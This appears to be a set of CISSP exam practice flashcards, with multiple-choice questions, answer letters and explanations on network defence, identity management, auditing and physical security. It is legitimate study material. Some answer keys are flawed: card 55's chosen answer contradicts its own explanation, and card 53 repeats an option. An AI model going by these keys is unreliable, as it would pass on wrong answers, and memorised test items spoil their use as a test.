D. PEAP is a version of EAP and is an authentication protocol used in wireless networks and point-to-point connections. PEAP is designed to provide authentication for 802.11 WLANs, which support 802.1X port access control and TLS. It is a protocol that encapsulates EAP within a potentially encrypted and authenticated TLS tunnel.

45
Q

An effective method to shield networks from unauthenticated DHCP clients is through the use of _______________ on network switches.

A. DHCP snooping

B. DHCP protection

C. DHCP shielding

D. DHCP caching

A

A. DHCP snooping ensures that DHCP servers can assign IP addresses to only selected systems, identified by their MAC addresses. Also, advanced network switches now have the capability to direct clients toward legitimate DHCP servers to get IP addresses and to restrict rogue systems from becoming DHCP servers on the network.

46
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

What type of client ports should Don make sure the institution’s software is using when client-to-server communication needs to take place?

A. Well known

B. Registered

C. Dynamic

D. Free

A

C. Well-known ports are mapped to commonly used services (HTTP, FTP, etc.). Registered ports are 1,024 to 49,151, and vendors register specific ports to map to their proprietary software. Dynamic ports (private ports) are available for use by any application.

47
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

Which of the following is a cost-effective countermeasure that Don’s team should implement?

A. Stateful firewall

B. Network address translation

C. SYN proxy

D. IPv6

A

C. A half-open attack is a type of DoS that is also referred to as a SYN flood. To thwart this type of attack, Don’s team can use SYN proxies, which limit the number of open and abandoned network connections. The SYN proxy is a piece of software that resides between the sender and receiver, and only sends TCP traffic to the receiving system if the TCP handshake process completes successfully.

48
Q

Don is a security manager of a large medical institution. One of his groups develops proprietary software that provides distributed computing through a client/server model. He has found out that some of the systems that maintain the proprietary software have been experiencing half-open denial-of-service attacks. Some of the software is antiquated and still uses basic remote procedure calls, which has allowed for masquerading attacks to take place.

What should Don’s team put into place to stop the masquerading attacks that have been taking place?

A. Dynamic packet-filtering firewall

B. ARP spoofing protection

C. Disable unnecessary ICMP traffic at edge routers

D. SRPC

A

D. Basic RPC does not have authentication capabilities, which allows for masquerading attacks to take place. Secure RPC (SRPC) can be implemented, which requires authentication to take place before remote systems can communicate with each other. Authentication can take place using shared secrets, public keys, or Kerberos tickets.

49
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following is the best countermeasure to put into place to help reduce the threat of network sniffers viewing network management traffic?

A. SNMP v3

B. L2TP

C. CHAP

D. Dynamic packet-filtering firewall

A

A. SNMP versions 1 and 2 send their community string values in cleartext, but with version 3, cryptographic functionality has been added, which provides encryption, message integrity, and authentication security. So the sniffers that are installed on the network cannot sniff SNMP traffic.

50
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following unauthorized activities have most likely been taking place in this situation?

A. DNS querying

B. Phishing

C. Forwarding

D. Zone transfer

A

D. The primary and secondary DNS servers synchronize their information through a zone transfer. After changes take place to the primary DNS server, those changes must be replicated to the secondary DNS server. It is important to configure the DNS server to allow zone transfers to take place only between the specific servers. Attackers can carry out zone transfers to gather very useful network information from victims’ DNS servers. Unauthorized zone transfers can take place if the DNS servers are not properly configured to restrict this type of activity.

51
Q

John is the manager of the security team within his company. He has learned that attackers have installed sniffers throughout the network without the company’s knowledge. Along with this issue his team has also found out that two DNS servers had no record replication restrictions put into place and the servers have been caching suspicious name resolution data.

Which of the following is the best countermeasure that John’s team should implement to protect from improper caching issues?

A. PKI

B. DHCP snooping

C. ARP protection

D. DNSSEC

A

D. When a DNS server receives an improper (potentially malicious) name resolution response, it will cache it and provide it to all the hosts it serves unless DNSSEC is implemented. If DNSSEC were enabled on a DNS server, then the server would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server.

52
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following is most likely taking place to allow spurious packets to gain unauthorized access to critical servers?

A. TCP sequence hijacking is taking place.

B. Source routing is not restricted.

C. Fragment attacks are underway.

D. Attacker is tunneling communication through PPP.

A

B. Source routing means the packet decides how to get to its destination, not the routers in between the source and destination computer. Source routing moves a packet throughout a network on a predetermined path. To make sure none of this misrouting happens, many firewalls are configured to check for source routing information within the packet and deny it if it is present.

53
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following best describes the firewall configuration issues Sean’s team member is describing?

A. Clean-up rule, stealth rule

B. Stealth rule, silent rule

C. Silent rule, negate rule

D. Stealth rule, silent rule

A

C. The following describes the different firewall rule types:

  • Silent rule: Drops “noisy” traffic without logging it. This reduces log sizes by not responding to packets that are deemed unimportant.
  • Stealth rule: Disallows access to firewall software from unauthorized systems.
  • Cleanup rule: The last rule in the rule base, which drops and logs any traffic that does not meet the preceding rules.
  • Negate rule: Used instead of the broad and permissive “any rules.” Negate rules provide tighter permission rights by specifying what system can be accessed and how.

54
Q

Sean is the new security administrator for a large financial institution. There are several issues that Sean is made aware of the first week he is in his new position. First, spurious packets seem to arrive at critical servers even though each network has tightly configured firewalls at each gateway position to control traffic to and from these servers. One of Sean’s team members complains that the current firewall logs are excessively large and full of useless data. He also tells Sean that the team needs to be using fewer permissive rules instead of the current “any-any” rule type in place. Sean has also found out that some team members want to implement tarpits on some of the most commonly attacked systems.

Which of the following best describes why Sean’s team wants to put in the mentioned countermeasure for the most commonly attacked systems?

A. Prevent production system hijacking

B. Reduce DoS attack effects

C. Gather statistics during the process of an attack

D. Increase forensic capabilities

A

B. A tarpit is commonly a piece of software configured to emulate a vulnerable, running service. Once the attackers start to send packets to this “service,” the connection to the victim system seems to be live and ongoing, but the response from the victim system is slow and the connection may time out. Most attacks and scanning activities take place through automated tools that require quick responses from their victim systems. If the victim systems do not reply or are very slow to reply, the automated tools may not be successful because the protocol connection times out. This can reduce the effects of a DoS attack.

55
Q

Tom’s company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is that employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, such as their switches, do not have this type of functionality available. Another issue Tom’s team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom’s boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution.

What should Tom’s team implement to provide source authentication and data encryption at the data link level?

A. IEEE 802.1AR

B. IEEE 802.1AE

C. IEEE 802.1AF

D. IEEE 802.1X

A

D. IEEE 802.1AR provides a unique ID for a device. IEEE 802.1AE provides data encryption, integrity, and origin authentication functionality. IEEE 802.1AF carries out key agreement functions for the session keys used for data encryption. Each of these standards provides specific parameters to work within an IEEE 802.1X EAP-TLS framework. A recent version (802.1X-2010) has integrated IEEE 802.1AE and IEEE 802.1AR to support service identification and optional point-to-point encryption.

56
Q

Tom’s company has been experiencing many issues with unauthorized sniffers being installed on the network. One reason is that employees can plug their laptops, smartphones, and other mobile devices into the network, any of which may be infected and have a running sniffer that the owner is not aware of. Implementing VPNs will not work because all of the network devices would need to be configured for specific VPNs, and some devices, such as their switches, do not have this type of functionality available. Another issue Tom’s team is dealing with is how to secure internal wireless traffic. While the wireless access points can be configured with digital certificates for authentication, pushing out and maintaining certificates on each wireless user device is cost prohibitive and will place too much of a burden on the network team. Tom’s boss has also told him that the company needs to move from a landline metropolitan area network solution to a wireless solution.

Which of the following solutions is best to meet the company’s need to protect wireless traffic?

A. EAP-TLS

B. EAP-PEAP

C. LEAP

D. EAP-TTLS

A

D. EAP-Tunneled Transport Layer Security (EAP-TTLS) is an EAP protocol that extends TLS. EAP-TTLS is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each wireless device be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates.

57
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Based upon the information in the scenario, what should the network team implement as it pertains to IPv6 tunneling?

A. Teredo should be configured on IPv6-aware hosts that reside behind the NAT device.

B. 6to4 should be configured on IPv6-aware hosts that reside behind the NAT device.

C. Intra-Site Automatic Tunnel Addressing Protocol should be configured on IPv6-aware hosts that reside behind the NAT device.

D. IPv6 should be disabled on all systems.

Harris, Shon. CISSP All-in-One Exam Guide, Eighth Edition (p. 725). McGraw-Hill Education. Kindle Edition.

A

A. Teredo encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a dedicated public IPv4 address.

58
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Which of the following is the best countermeasure for the attack type addressed in the scenario?

A. DNSSEC

B. IPSec

C. Split server configurations

D. Disabling zone transfers

A

A. DNSSEC protects DNS servers from forged DNS information, which is commonly used to carry out DNS cache poisoning attacks. If DNSSEC is implemented, then all responses that the server receives will be verified through digital signatures. This helps ensure that an attacker cannot provide a DNS server with incorrect information, which would point the victim to a malicious website.

59
Q

Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network’s NAT device. Lance has also found out that caching attacks have been successful against the company’s public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options.

Which of the following technologies should Lance’s team investigate for increased authentication efforts?

A. Challenge Handshake Authentication Protocol

B. Simple Authentication and Security Layer

C. IEEE 802.2AB

D. EAP-SSL

A

B. Simple Authentication and Security Layer is a protocol-independent authentication framework. This means that any protocol that knows how to interact with SASL can use its various authentication mechanisms without having to actually embed the authentication mechanisms within its code.

60
Q

Wireless LAN technologies have gone through different versions over the years to address some of the inherent security issues within the original IEEE 802.11 standard. Which of the following provides the correct characteristics of Wi-Fi Protected Access 2 (WPA2)?

A. IEEE 802.1X, WEP, MAC

B. IEEE 802.1X, EAP, TKIP

C. IEEE 802.1X, EAP, WEP

D. IEEE 802.1X, EAP, CCMP

A

D. Wi-Fi Protected Access 2 requires IEEE 802.1X or preshared keys for access control, EAP or preshared keys for authentication, and the AES algorithm in Counter mode with CBC-MAC Protocol (CCMP) for encryption.

61
Q

Alice wants to send a message to Bob, who is several network hops away from her. What is the best approach to protecting the confidentiality of the message?

A. PPTP

B. S/MIME

C. Link encryption

D. SSH

A

B. Secure Multipurpose Internet Mail Extensions (S/MIME) is a standard for encrypting and digitally signing e-mail and for providing secure data transmissions using public key infrastructure (PKI).

62
Q

Charlie uses PGP on his Linux-based e-mail client. His friend Dave uses S/MIME on his Windows-based e-mail. Charlie is unable to send an encrypted e-mail to Dave. What is the likely reason?

A. PGP and S/MIME are incompatible.

B. Each has a different secret key.

C. Each is using a different CA.

D. There is not enough information to determine the likely reason.

A

A. PGP uses a decentralized web of trust for its PKI, while S/MIME relies on centralized CAs. The two systems are, therefore, incompatible with each other.

63
Q

Which item is not part of a Kerberos authentication implementation?

A. Message authentication code

B. Ticket granting service

C. Authentication service

D. Users, programs, and services

A

A. Message authentication code (MAC) is a cryptographic function and is not a key component of Kerberos. Kerberos is made up of a KDC, a realm of principals (users, services, applications, and devices), an authentication service, tickets, and a ticket granting service.

64
Q

In discretionary access control security, who has delegation authority to grant access to data?

A. User

B. Security officer

C. Security policy

D. Owner

A

D. This question may seem a little confusing if you were stuck between user and owner. Only the data owner can decide who can access the resources she owns. She may or may not be a user. A user is not necessarily the owner of the resource. Only the actual owner of the resource can dictate what subjects can actually access the resource.

65
Q

Which of the following is the best description of directories that are used in identity management technology?

A. Most are hierarchical and follow the X.500 standard.

B. Most have a flat architecture and follow the X.400 standard.

C. Most have moved away from LDAP.

D. Many use LDAP.

A

A. Most enterprises have some type of directory that contains information pertaining to the company’s network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard, and a protocol, such as the Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request.

66
Q

Which of the following is not considered an anomaly-based intrusion protection system?

A. Statistical anomaly–based

B. Protocol anomaly–based

C. Temporal anomaly–based

D. Traffic anomaly–based

A

C. An anomaly-based IPS is a behavioral-based system that learns the “normal” activities of an environment. The three types are listed next:

  • Statistical anomaly–based: Creates a profile of “normal” and compares activities to this profile
  • Protocol anomaly–based: Identifies protocols used outside of their common bounds
  • Traffic anomaly–based: Identifies unusual activity in network traffic

67
Q

George is responsible for setting and tuning the thresholds for his company’s behavior-based IDS. Which of the following outlines the possibilities of not doing this activity properly?

A. If the threshold is set too low, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

B. If the threshold is set too low, nonintrusive activities are considered attacks (false negatives). If the threshold is set too high, malicious activities are not identified (false positives).

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

D. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

A

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

68
Q

Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company’s partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees.

Which of the following changes would be best for Tom’s team to implement?

A. Move from namespaces to distinguished names.

B. Move from meta-directories to virtual directories.

C. Move from RADIUS to TACACS+.

D. Move from a centralized to a decentralized control model.

A

B. A meta-directory within an IdM physically contains the identity information within an identity store. It allows identity information to be pulled from various locations and be stored in one local system (identity store). The data within the identity store is updated through a replication process, which may take place weekly, daily, or hourly depending upon configuration. Virtual directories use pointers to where the identity data resides on the original system; thus, no replication processes are necessary. Virtual directories usually provide the most up-to-date identity information since they point to the original source of the data.

69
Q

Tom is a new security manager for a retail company, which currently has an identity management system (IdM) in place. The data within the various identity stores updates more quickly than the current IdM software can keep up with, so some access decisions are made based upon obsolete information. While the IdM currently provides centralized access control of internal network assets, it is not tied into the web-based access control components that are embedded within the company’s partner portals. Tom also notices that help-desk technicians are spending too much time resetting passwords for internal employees.

Which of the following components should Tom make sure his team puts into place?

A. Single sign-on module

B. LDAP directory service synchronization

C. Web access management

D. X.500 database

A

C. Web access management (WAM) is a component of most IdM products that allows for identity management of web-based activities to be integrated and managed centrally.

70
Q

Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company’s CEO wants to allow its partners’ customers to be able to purchase items through the company’s web stores as easily as possible. The CEO also wants the company’s partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks.

Lenny has a meeting with the internal software developers who are responsible for implementing the necessary functionality within the web-based system. Which of the following best describes the two items that Lenny needs to be prepared to discuss with this team?

A. Service Provisioning Markup Language and the Extensible Access Control Markup Language

B. Standard Generalized Markup Language and the Generalized Markup Language

C. Extensible Markup Language and the Hypertext Markup Language

D. Service Provisioning Markup Language and the Generalized Markup Language

A

A. The Service Provisioning Markup Language (SPML) allows company interfaces to pass service requests, and the receiving company provisions (allows) access to these services. Both the sending and receiving companies need to be following the XML standard, which will allow this type of interoperability to take place. When using the Extensible Access Control Markup Language (XACML), application security policies can be shared with other applications to ensure that both are following the same security rules. The developers need to integrate both of these language types to allow for their partner employees to interact with their inventory systems without having to conduct a second authentication step. The use of the languages can reduce the complexity of inventory control between the different companies.

71
Q

Lenny is a new security manager for a retail company that is expanding its functionality to its partners and customers. The company’s CEO wants to allow its partners’ customers to be able to purchase items through the company’s web stores as easily as possible. The CEO also wants the company’s partners to be able to manage inventory across companies more easily. The CEO wants to be able to understand the network traffic and activities in a holistic manner, and he wants to know from Lenny what type of technology should be put into place to allow for a more proactive approach to stopping malicious traffic if it enters the network. The company is a high-profile entity constantly dealing with zero-day attacks.

Pertaining to the CEO’s security concerns, what should Lenny suggest the company put into place?

A. Security event management software, an intrusion prevention system, and behavior-based intrusion detection

B. Security information and event management software, an intrusion detection system, and signature-based protection

C. An intrusion prevention system, security event management software, and malware protection

D. An intrusion prevention system, security event management software, and war-dialing protection

A

A. Security event management software allows for network traffic to be viewed holistically by gathering log data centrally and analyzing it. The intrusion prevention system allows for proactive measures to be put into place to help in stopping malicious traffic from entering the network. Behavior-based intrusion detection can identify new types of attacks (zero day) compared to signature-based intrusion detection.

72
Q

Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO’s secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes.

Which of the following is the best remote access technology for this situation?

A. RADIUS

B. TACACS+

C. Diameter

D. Kerberos

A

C. Diameter was developed to build on the functionality of RADIUS and to overcome its limitations; it is RADIUS’s successor rather than a backward-compatible extension. It supports authentication across a variety of technologies (PPP, VoIP, Ethernet, and so on), so the roaming employees, the VoIP end systems, and the internal resources can all be handled in one place, which is the centralized administration of access control the scenario calls for.

73
Q

Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO’s secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes.

What are the two main security concerns Robbie is most likely being asked to identify and mitigate?

A. Social engineering and spear-phishing

B. War dialing and pharming

C. Spear-phishing and war dialing

D. Pharming and spear-phishing

A

C. Spear-phishing is a targeted social engineering attack, which is what the CIO’s secretary is most likely experiencing. War dialing is a brute-force attack against devices that use phone numbers, as in modems. If the modems can be removed, the risk of war-dialing attacks decreases.

74
Q

Tanya is working with the company’s internal software development team. Before a user of an application can access files located on the company’s centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company’s missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure.

Which of the following best describes what is currently in place?

A. Capability-based access system

B. Synchronous tokens that generate one-time passwords

C. RADIUS

D. Kerberos

A

A. In a capability-based access control system the subject (user) must present something, such as a ticket, token, or key, that outlines what it may access; the capability is tied to the subject for access control purposes. A synchronous token is not what is in place, because the scenario specifically states that a challenge/response mechanism is used, which indicates an asynchronous token.

75
Q

Tanya is working with the company’s internal software development team. Before a user of an application can access files located on the company’s centralized server, the user must present a valid one-time password, which is generated through a challenge/response mechanism. The company needs to tighten access control for these files and reduce the number of users who can access each and every file. The company is looking to Tanya and her team for solutions to better protect the data that has been classified and deemed critical to the company’s missions. Tanya has also been asked to implement a single sign-on technology for all internal users, but she does not have the budget to implement a public key infrastructure.

Which of the following is the best single sign-on technology for this situation?

A. PKI

B. Kerberos

C. RADIUS

D. TACACS+

A

B. The scenario specifies that PKI cannot be used, so the first option is not correct. Kerberos is based upon symmetric cryptography; thus, it does not need a PKI. RADIUS and TACACS+ are remote centralized access control protocols.

76
Q

Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner.

Which of the following best describes the types of languages and/or protocols that Harry needs to ensure are implemented?

A. Security Assertion Markup Language, Extensible Access Control Markup Language, Service Provisioning Markup Language

B. Service Provisioning Markup Language, Simple Object Access Protocol, Extensible Access Control Markup Language

C. Extensible Access Control Markup Language, Security Assertion Markup Language, Simple Object Access Protocol

D. Service Provisioning Markup Language, Security Association Markup Language

A

C. The most appropriate languages and protocols for the purpose laid out in the scenario are Extensible Access Control Markup Language, Security Assertion Markup Language, and Simple Object Access Protocol. Harry’s group is not necessarily overseeing account provisioning, so the Service Provisioning Markup Language is not necessary, and there is no language called “Security Association Markup Language.”

77
Q

Harry is overseeing a team that has to integrate various business services provided by different company departments into one web portal for both internal employees and external partners. His company has a diverse and heterogeneous environment with different types of systems providing customer relationship management, inventory control, e-mail, and help-desk ticketing capabilities. His team needs to allow different users access to these different services in a secure manner.

The company’s partners need to integrate compatible authentication functionality into their web portals to allow for interoperability across the different company boundaries. Which of the following will deal with this issue?

A. Service Provisioning Markup Language

B. Simple Object Access Protocol

C. Extensible Access Control Markup Language

D. Security Assertion Markup Language

A

D. Security Assertion Markup Language allows the exchange of authentication and authorization data to be shared between security domains. It is one of the most commonly used approaches to allow for single sign-on capabilities within a web-based environment.

78
Q

Internal audits are the preferred approach when which of the following is true?

A. The organization lacks the organic expertise to conduct them.

B. Regulatory requirements dictate the use of a third-party auditor.

C. The budget for security testing is limited or nonexistent.

D. There is concern over the spillage of proprietary or confidential information.

A

C. Third-party auditors are almost always fairly expensive, so if the organization’s budget does not support their use, it may be necessary to use internal assets to conduct the audit.

79
Q

Choose the term that describes an audit performed to demonstrate that an organization is complying with its contractual obligations to another organization.

A. Internal audit

B. Third-party audit

C. External audit

D. Compliance audit

A

C. External audits are used to ensure that contractors are meeting their contractual obligations, so that is the best answer. A compliance audit would apply to regulatory or industry standards and would almost certainly be a third-party audit, which makes answer D a poor fit in most cases.

80
Q

An assessment whose goal is to assess the susceptibility of an organization to social engineering attacks is best classified as

A. Physical testing

B. Personnel testing

C. Vulnerability testing

D. Network testing

A

B. Social engineering is focused on people, so personnel testing is the best answer.

81
Q

Security event logs can best be protected from tampering by which of the following?

A. Encrypting the contents using asymmetric key encryption

B. Ensuring every user has administrative rights on their own workstations

C. Using remote logging over simplex communications media

D. Storing the event logs on DVD-RW

A

C. Using a remote logging host raises the bar for attackers: compromising one host is no longer enough, because they would also have to compromise the remote logger to tamper with the logs. A simplex channel (one that carries data only toward the log host) hinders them further, since it cannot be used from the compromised host to reach back and alter what has already been recorded.

82
Q

Synthetic transactions are best described as

A. Real user monitoring (RUM)

B. Transactions that fall outside the normal purpose of a system

C. Transactions that are synthesized from multiple users’ interactions with the system

D. A way to test the behavior and performance of critical services

A

D. Synthetic transactions are those that simulate the behavior of real users, but are not the result of real user interactions with the system. They allow an organization to ensure that services are behaving properly without having to rely on user complaints to detect problems.

83
Q

One of the actions that attackers typically attempt after compromising a system is to acquire the ability to mimic a normal privileged user. What is one way in which they may accomplish this?

A. Rebooting the compromised host

B. Exporting the password hash table

C. Pivoting from the compromised host to another target

D. Adding a privileged user account

A

D. After compromising a host, attackers may attempt a number of actions, but will typically attempt to blend in by acquiring administrative privileges. They can do this by either compromising a privileged account, adding a privileged account, or elevating the privileges of the account they compromised.

84
Q

Which of the following is not normally an element of user accounts management audits?

A. Password hashing

B. Signed AUPs

C. Privileged accounts

D. Suspended accounts

A

A. Password hashing (covered in Chapter 5) is a very common approach to protecting user account passwords, but varies from one platform to the next. It is almost always controlled by the system itself and would normally not be part of the user accounts management audit.

85
Q

Which operating systems allows users to temporarily elevate their privileges in order to launch an application at a higher privilege level?

A. All major desktop operating systems

B. Recent versions of Windows

C. Linux and Windows

D. Recent versions of macOS

A

A. All major operating systems allow for the temporary elevation of user privileges, but macOS and some versions of Linux require the user to do so from a terminal window.

86
Q

Data backup verification efforts should

A. Have the smallest scope possible

B. Be based on the threats to the organization

C. Maximize impact on business

D. Focus on user data

A

B. The verification of data backups should focus on assessing the organization’s ability to respond to the threats identified during the threat modeling and risk management processes. If the organization can’t respond to these threats, then its backups may be useless.

87
Q

Which of the following is not a form of social engineering?

A. Pretexting

B. Fishing

C. Whaling

D. Blackmailing

A

B. The correct term for social engineering conducted over digital communications means is phishing, not fishing.

88
Q

Which of the following is true about key risk indicators (KRIs)?

A. They tell managers where an organization stands with regard to its goals.

B. They are inputs to the calculation of single loss expectancy (SLE).

C. They tell managers where an organization stands with regard to its risk appetite.

D. An interpretation of one or more metrics that describes the effectiveness of the ISMS.

A

C. Key risk indicators (KRIs) allow managers to understand when specific activities of the organization are moving it toward a higher level of risk. They are useful to understanding changes and managing the overall risk.

89
Q

Which of the following is true of management reviews?

A. They happen periodically and include results of audits as a key input.

B. They happen in an ad hoc manner as the needs of the organization dictate.

C. They are normally conducted by mid-level managers, but their reports are presented to the key business leaders.

D. They are focused on assessing the management of the information systems.

A

A. Management reviews work best when they are regularly scheduled events involving the key organizational leaders, because a fixed schedule lets subordinate leaders plan and conduct the assessments, such as audits, that provide the inputs to the review.

90
Q

Which of the following is not true about continuous monitoring?

A. It involves ad hoc processes that provide agility in responding to novel attacks.

B. Its main goal is to support organizational risk management.

C. It helps determine whether security controls remain effective.

D. It relies on carefully chosen metrics and measurements.

A

A. Continuous monitoring is a deliberate, data-driven process supporting organizational risk management. One of the key questions it answers is: are controls still effective at mitigating risks? Continuous monitoring could potentially lead to a decision to implement specific ad hoc processes, but these would not really be part of continuous monitoring.

91
Q

A company needs to implement a CCTV system that will monitor a large area outside the facility. Which of the following is the correct lens combination for this?

A. A wide-angle lens and a small lens opening

B. A wide-angle lens and a large lens opening

C. A wide-angle lens and a large lens opening with a small focal length

D. A wide-angle lens and a large lens opening with a large focal length

A

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

92
Q

Which of the following is not a true statement about CCTV lenses?

A. Lenses that have a manual iris should be used in outside monitoring.

B. Zoom lenses will carry out focus functionality automatically.

C. Depth of field increases as the size of the lens opening decreases.

D. Depth of field increases as the focal length of the lens decreases.

A

A. Manual iris lenses have a ring around the CCTV lens that can be manually turned and controlled. A lens that has a manual iris would be used in an area that has fixed lighting, since the iris cannot self-adjust to changes of light. An auto iris lens should be used in environments where the light changes, such as an outdoor setting. As the environment brightens, this is sensed by the iris, which automatically adjusts itself. Security personnel will configure the CCTV to have a specific fixed exposure value, which the iris is responsible for maintaining. The other answers are true.

93
Q

What is true about a transponder?

A. It is a card that can be read without sliding it through a card reader.

B. It is a biometric proximity device.

C. It is a card that a user swipes through a card reader to gain access to a facility.

D. It exchanges tokens with an authentication server.

A

A. A transponder is a type of physical access control device that does not require the user to slide a card through a reader. The reader and card communicate directly. The card and reader have a receiver, transmitter, and battery. The reader sends signals to the card to request information. The card sends the reader an access code.

94
Q

What are the two general types of proximity identification devices?

A. Biometric devices and access control devices

B. Swipe card devices and passive devices

C. Preset code devices and wireless devices

D. User-activated devices and system sensing devices

A

D. A user-activated device requires the user to do something: swipe the card through the reader and/or enter a code. A system sensing device recognizes the presence of the card and communicates with it without the user needing to carry out any activity.

95
Q

Which of the following best describes the difference between a warded lock and a tumbler lock?

A. A tumbler lock is more simplistic and easier to circumvent than a warded lock.

B. A tumbler lock uses an internal bolt, and a warded lock uses internal cylinders.

C. A tumbler lock has more components than a warded lock.

D. A warded lock is mainly used externally, and a tumbler lock is used internally.

A

C. The tumbler lock has more pieces and parts than a warded lock. The key fits into a cylinder, which raises the lock metal pieces to the correct height so the bolt can slide to the locked or unlocked position. A warded lock is easier to circumvent than a tumbler lock.

96
Q

All of the following are best practices for controlling the software that is installed and authorized to run in our systems except

A. Application whitelisting

B. Code reviews

C. Gold Masters

D. Least privilege

A

B. Code reviews are focused on finding and fixing defects in software that is under development. They do not help control which applications are allowed to run on our computers.

97
Q

